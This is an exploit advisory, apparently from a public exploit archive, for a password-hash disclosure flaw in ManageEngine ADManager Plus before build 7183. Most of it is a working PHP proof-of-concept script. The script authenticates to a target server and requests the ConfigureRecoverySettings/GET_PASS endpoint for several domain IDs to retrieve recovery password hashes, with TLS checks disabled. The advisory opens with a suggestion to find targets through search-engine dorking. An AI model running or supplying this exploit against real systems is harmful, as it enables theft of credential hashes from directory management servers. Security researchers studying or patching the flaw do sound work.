ManageEngine ADManager 7183 Password Hash Disclosure

=============================================================================================================================================
| # Title : ManageEngine ADManager 7183 Password Hash Disclosure Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.2 (64 bits) |
| # Vendor : https://www.manageengine.com/products/ad-manager/ |
=============================================================================================================================================

POC :

[+] Dorking İn Google Or Other Search Enggine.

[+] ManageEngine ADManager Plus versions prior to build 7183 suffers from a Password Hash disclosure vulnerability..

[+] save code as poc.php .

[+] USage : php poc.php -t <target_url> -a <auth> -u <username> -p <password>

[+] PayLoad :

<?php

// تعطيل تحذيرات HTTPS
error_reporting(0);

function getPass($target, $auth, $user, $password) {
// تهيئة Session
$ch = curl_init();

// تحويل نوع المصادقة إذا كان ADManager
if (strtolower($auth) == ‘admanager’) {
$auth = ‘ADManager Plus Authentication’;
}

// بيانات تسجيل الدخول
$data = http_build_query([
“is_admp_pass_encrypted” => “false”,
“j_username” => $user,
“j_password” => $password,
“domainName” => $auth,
“AUTHRULE_NAME” => “ADAuthenticator”
]);

// إعدادات الطلب
$url = $target . ‘j_security_check?LogoutFromSSO=true’;
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_HTTPHEADER, [
“User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0”,
“Content-Type: application/x-www-form-urlencoded”
]);

// إرسال الطلب
$response = curl_exec($ch);

// التحقق من المصادقة
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
if (strpos($response, ‘Cookie’) !== false) {
echo “[+] Authentication successful!\n”;
} elseif ($http_code == 200) {
echo “[-] Invalid login name/password!\n”;
exit(0);
} else {
echo “[-] Something went wrong!\n”;
exit(1);
}

// استرجاع كلمة المرور
for ($i = 1; $i <= 5; $i++) {
echo “[*] Trying to fetch recovery password for domainId: $i!\n”;
$passUrl = $target . ‘ConfigureRecoverySettings/GET_PASS?req=%7B%22domainId%22%3A%22’ . $i . ‘%22%7D’;
curl_setopt($ch, CURLOPT_URL, $passUrl);
curl_setopt($ch, CURLOPT_POST, false);
$passResponse = curl_exec($ch);

if ($passResponse) {
echo $passResponse . “\n”;
}
}

curl_close($ch);
}

function get_args() {
global $argv;

$args = [
‘target’ => ”,
‘auth’ => ”,
‘user’ => ”,
‘password’ => ”
];

for ($i = 1; $i < count($argv); $i++) {
switch ($argv[$i]) {
case ‘-t’:
case ‘–target’:
$args[‘target’] = $argv[++$i];
break;
case ‘-a’:
case ‘–auth’:
$args[‘auth’] = $argv[++$i];
break;
case ‘-u’:
case ‘–user’:
$args[‘user’] = $argv[++$i];
break;
case ‘-p’:
case ‘–password’:
$args[‘password’] = $argv[++$i];
break;
}
}

return $args;
}

function main() {
$args = get_args();
if (!$args[‘target’] || !$args[‘auth’] || !$args[‘user’] || !$args[‘password’]) {
echo “Usage: php exploit.php -t <target_url> -a <auth> -u <username> -p <password>\n”;
exit(1);
}

getPass($args[‘target’], $args[‘auth’], $args[‘user’], $args[‘password’]);
}

main();

?>

Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================